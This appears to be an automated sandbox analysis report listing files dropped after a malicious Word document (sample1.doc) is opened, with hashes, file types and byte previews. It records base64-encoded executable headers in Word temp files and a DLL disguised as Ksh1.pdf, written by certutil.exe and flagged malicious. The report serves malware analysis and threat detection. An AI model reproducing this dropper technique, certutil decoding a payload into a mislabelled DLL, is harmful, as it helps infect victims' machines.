                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0005.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):598272
                                                      Entropy (8bit):5.856822353998229
                                                      Encrypted:false
                                                      SSDEEP:12288:FmkwUHZaSyYGKFaaGXuG7ttehnyragYqyPhU:FmkVZm2hnyDxAC
                                                      MD5:7E9AB23E4F7C98AF0A03B64E3C14D7F6
                                                      SHA1:BAD0DC91FB2929FDBF66E569257BABA97E1EC233
                                                      SHA-256:532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE
                                                      SHA-512:014420FD9C97DBCFF01E11E385E392D8F9AB91D238A418E76C72CD1CD191D2BEE17E7442398C20BA229AD25B0461778F76A88039B1810E20E88A0FE58C434789
                                                      Malicious:false
                                                      Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0666.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1191944
                                                      Entropy (8bit):3.9253267830463896
                                                      Encrypted:false
                                                      SSDEEP:12288:ade8HF9kUxyxlFnsn4yA9W8MZ5axhVYGByJGZGy9e3rfTqtTfLlR1xwSaf67HNu4:me8HFmU/4yA9W89VYU7sY7yz1DsVirpI
                                                      MD5:DA122309698B26E96848A6A829EEF5C1
                                                      SHA1:DFA1B8C96C19827A595EEB15B2EC5386F9746CEF
                                                      SHA-256:26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A
                                                      SHA-512:4318F2A585966FC03A86D566819F06F15A93BE1616231FC34E4C5B7F0B6317083654B7F9C446D250D91C25176853B8CEB42504419D35ECD7F8DEC4C6048B5D7D
                                                      Malicious:false
                                                      Preview: T.V.q.Q.A.A.M.A.A.A.A.E.A.A.A.A././.8.A.A.L.g.A.A.A.A.A.A.A.A.A.Q.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.A.E.A.A.A.4.f.u.g.4.A.t.A.n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J.A.A.A.A.A.A.A.A.A.A.p.T.i.i.j.b.S.9.G.8.G.0.v.R.v.B.t.L.0.b.w.2.b.O.3.8.G.c.v.R.v.D.Z.s.7.X.w.G.i.9.G.8.N.m.z.t.P.B.1.L.0.b.w.P.0.d.D.8.U.0.v.R.v.A./.R.0.L.x.Y.i.9.G.8.D.9.H.R.f.F.+.L.0.b.w.Z.F.f.V.8.G.g.v.R.v.B.t.L.0.f.w.C.S.9.G.8.P.d.G.T./.F.s.L.0.b.w.9.0.Z.G.8.W.w.v.R.v.D.3.R.r.n.w.b.C.9.G.8.G.0.v.0.f.B.s.L.0.b.w.9.0.Z.E.8.W.w.v.R.v.B.S.a.W.N.o.b.S.9.G.8.A.A.A.A.A.A.A.A.A.A.A.U.E.U.A.A.E.w.B.B.Q.A.r.7.Z.h.f.A.A.A.A.A.A.A.A.A.A.D.g.A.A.I.h.C.w.E.O.E.A.A.U.A.Q.A.A.x.A.U.A.A.A.A.A.A.G.R.9.A.A.A.A.E.A.A.A.A.D.A.B.A.A.A.A.A.B.A.A.E.A.A.A.A.A.I.A.A.A.U.A.A.Q.A.A.A.A.A.A.B.Q.A.B.A.A.A.A.A.A.A.A.E.A.c.A.A.A.Q.A.A.A.A.A.A.A.A.D.A.E.A.B.A.A.A.Q.A.A.A.Q.A.A.A.A.A.B.A.A.A.B.A.A.
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0798.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):600580
                                                      Entropy (8bit):5.850565167047853
                                                      Encrypted:false
                                                      SSDEEP:12288:nmkTbcqi+vjtKTA4rWgRRtgqDnygr6Yq/PWY:nmkvdbKDnyzx35
                                                      MD5:1D35754EDB0B7AA76891735215FC048A
                                                      SHA1:E0B1C34B3C39C1F097B7A3749174D098DC51E265
                                                      SHA-256:C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348
                                                      SHA-512:6851E23E0FBFF103D5BDCE5CDC4D425C070D8E72BA66525CD2F85255F5BF3921C434C371B1459F184468546670AC26FD307035572E12DF84D1172517E8202A07
                                                      Malicious:false
                                                      Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{35EB0BAB-3BC6-4A41-A07F-15EEA53DBB38}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1536
                                                      Entropy (8bit):1.3586208805849453
                                                      Encrypted:false
                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbC:IiiiiiiiiifdLloZQc8++lsJe1MzNn
                                                      MD5:EAA701BCC2359F9297273D117620CA80
                                                      SHA1:D9E2AC26703E2668720A5B3E796DF52F3F52674A
                                                      SHA-256:497E3B43D545A03EE2E00324DEAC332FD13FF811F41B42F881BCAD29AE14250D
                                                      SHA-512:6F4F6936A2D454FABE565A177322B84A853DE887CBF1B10ECBFFF9D7755465AE60BFCBE66F4F949D986D103F12550B5160F614A74729DE0838DC451C76757491
                                                      Malicious:false
                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5C9B88B-61BE-41BF-89DB-AF92964D1C77}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Ksh1.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 14 11:01:41 2021, mtime=Thu Jan 14 11:01:41 2021, atime=Thu Jan 14 11:01:42 2021, length=595972, window=hide
                                                      Category:dropped
                                                      Size (bytes):3660
                                                      Entropy (8bit):4.4870215514715746
                                                      Encrypted:false
                                                      SSDEEP:96:87k/XicyByK27k/XicyByK2vk/X/c1O2vk/X/c12:87Iu27Iu2v51pv512
                                                      MD5:5C048363FB804C47823972D53B75D3A5
                                                      SHA1:FF2FD7DCCF53FA0A6F7E4DED1080C26A6A8F97AE
                                                      SHA-256:FE5D58BEC071D21ECEAD746CFCF14EEC223B18E18282DECB92D49CB8607885AA
                                                      SHA-512:D74E71166AB2CEA9A0093A59D043E3D65E219E8376D34D3D3721FEBFDB916A2B1AF68D9221AC11DB1824FAF78EBD32865403404B7049EB7ED23339BB6B1AB1FB
                                                      Malicious:false
                                                      Preview: L..................F.... ...;2B.m...;2B.m....M..m...........................q....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1......R6`..Public..b.......:...R6`*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....V.2......R6` .Ksh1.xls..>.......R5`.R5`*...;.....................K.s.h.1...x.l.s.......k...............-...8...[............?J......C:\Users\..#...................\\424505\Users.Public\Ksh1.xls.!.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.K.s.h.1...x.l.s..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......424505..........D_....3N...W...9H.C...........[D_....3N...W...9H.C...........[....L..................F.... ...;2B.m...;2B.m....M..m...........................q....P.O.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Jul 14 02:20:08 2009, mtime=Thu Jan 14 11:01:41 2021, atime=Thu Jan 14 11:01:41 2021, length=4096, window=hide
                                                      Category:dropped
                                                      Size (bytes):1604
                                                      Entropy (8bit):4.462420567483035
                                                      Encrypted:false
                                                      SSDEEP:24:8L/XRlekwvB3qcL7Y2//XRlekwvB3qcL7c:8L/XjVFcfY2//XjVFcfc
                                                      MD5:13715C1A57AC925C6D3529F23D8A0489
                                                      SHA1:7475EF6A91727FD8449840C0B783B3FD34D5D7F1
                                                      SHA-256:29832B00F50E3D4E063F7C97E2430C5A0F833CB5D3A2E66C1DFE2AE990C94832
                                                      SHA-512:4137D28186FA2B19F766D33C5592236A59535C50A60FADBB48C5FAB332596C6FF17C45EFE460846E64F9755D5C911CD5B06F0CBA80EE9A185648D3B497EE854F
                                                      Malicious:false
                                                      Preview: L..................F............1...;2B.m...;2B.m................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1......>.C..Public..b.......:...>.C*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......b...............-...8...[............?J......C:\Users\..#...................\\424505\Users.Public.......\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......424505..........D_....3N...W...9G.C...........[D_....3N...W...9G.C...........[....L..................F............1....3..m....3..m................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):438
                                                      Entropy (8bit):4.369509432724656
                                                      Encrypted:false
                                                      SSDEEP:6:M6dYrtg9CMdg9CMdg9UYrtg9CMUg9UYrhMUg9CMRMUg9s:M6IgEEgEEgJgEtg9tgEytgC
                                                      MD5:9DDA3519F04FDEEB47B198EDD010E507
                                                      SHA1:AC6C4075745C0F0064ADED9504934DDA44CB30E9
                                                      SHA-256:A677F9380C0B0EB229D861D18FDDFFD4642FFCAF1ABF9007A77EC37F05F0BDBC
                                                      SHA-512:8C0372F4659764915EC4D9EBA74F71E4464F1E5C56A0B31AF05638A747790B9AD2834642D94EB0512AEA1B5D8E292D9CB0029A849A0C91244376A50EC6501667
                                                      Malicious:false
                                                      Preview: [doc]..sample1.LNK=0..sample1.LNK=0..[doc]..sample1.LNK=0..Public.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Public.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[xls]..Ksh1.LNK=0..Public.LNK=0..[doc]..sample1.LNK=0..Ksh1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[doc]..sample1.LNK=0..Ksh1.LNK=0..[xls]..Ksh1.LNK=0..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample1.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 14 11:00:31 2021, mtime=Thu Jan 14 11:00:31 2021, atime=Thu Jan 14 11:00:33 2021, length=856064, window=hide
                                                      Category:dropped
                                                      Size (bytes):1994
                                                      Entropy (8bit):4.504905520297006
                                                      Encrypted:false
                                                      SSDEEP:48:8C/XT3ITfhclhVMDlOcQh2C/XT3ITfhclhVMDlOcQ/:8C/XLIT5UcQh2C/XLIT5UcQ/
                                                      MD5:2EAF88677CD16A68B2CD4263BA9E7CE0
                                                      SHA1:AA9B6C640105E9474BABBF76571C364926445178
                                                      SHA-256:919A3D28BFBE2D4CE57DCF0A8B1400DB858BAD490FEB436C3F4EFE343EB262BB
                                                      SHA-512:7AA17F78876C1B55BBA4C8973D8420992E1C53D54667848D84B7857C6D066862C1AE9D2B83DE5A525DD45B0B6FFBF19B2D89372A42BC63A4E5BA0E2296D5140D
                                                      Malicious:false
                                                      Preview: L..................F.... ....hv.l....hv.l.......l................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.`..Desktop.d......QK.X.R.`*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....^.2......R.` .sample1.doc.D.......R.`.R.`*...?.....................s.a.m.p.l.e.1...d.o.c.......u...............-...8...[............?J......C:\Users\..#...................\\424505\Users.user\Desktop\sample1.doc.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.a.m.p.l.e.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......424505..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Users\user\Desktop\~$ample1.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Users\Public\Ksh1.pdf
                                                      Process:C:\Windows\System32\certutil.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):446976
                                                      Entropy (8bit):7.675102075961339
                                                      Encrypted:false
                                                      SSDEEP:12288:NWSikkQXsGOCAStP1W+TXPc9JXvaWv7j3:ESiL5Sp1W+TYfHj
                                                      MD5:706EA7F029E6BC4DBF845DB3366F9A0E
                                                      SHA1:942443DFB8784066523DB761886115E08C99575F
                                                      SHA-256:FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC
                                                      SHA-512:036D5DE7E732302EF81989FBA62ABB1375119FC8141748D6548ED2310E95BDC07468ADA5CBF06C4F721B2B95CAF51E3267D4EF6DB2A2031CF5C8B2ABEE1C15A3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Metadefender, Detection: 41%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 64%
                                                      Joe Sandbox View:
                                                      • Filename: sample1.doc, Detection: malicious, Browse
                                                      • Filename: sample1.doc, Detection: malicious, Browse
                                                      • Filename: task5.doc, Detection: malicious, Browse
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)N(.m/F.m/F.m/F....g/F...../F....u/F.?GC.M/F.?GB.b/F.?GE.~/F.dW..h/F.m/G../F..FO.l/F..FF.l/F..F..l/F.m/..l/F..FD.l/F.Richm/F.........PE..L...+._...........!................d}.......0............................................@.............................H...X...<.......PB..........................0|..8...........................h|..@............0..8............................text...g........................... ..`.rdata..d\...0...^..................@..@.data................v..............@....rsrc...PB.......D...~..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                      C:\Users\Public\~$Ksh1.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Users\Public\~$Ksh1.xls
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Users\Public\~WRD0000.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):595972
                                                      Entropy (8bit):5.85065356609278
                                                      Encrypted:false
                                                      SSDEEP:12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9
                                                      MD5:D631AB4CEFF199B52FF4E4B7AAD0199D
                                                      SHA1:F30002C31BF32184507182100942A2012F0B8703
                                                      SHA-256:9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE
                                                      SHA-512:56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162
                                                      Malicious:false
                                                      Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      C:\Users\Public\~WRD0004.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):595972
                                                      Entropy (8bit):5.85065356609278
                                                      Encrypted:false
                                                      SSDEEP:12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9
                                                      MD5:D631AB4CEFF199B52FF4E4B7AAD0199D
                                                      SHA1:F30002C31BF32184507182100942A2012F0B8703
                                                      SHA-256:9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE
                                                      SHA-512:56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162
                                                      Malicious:false
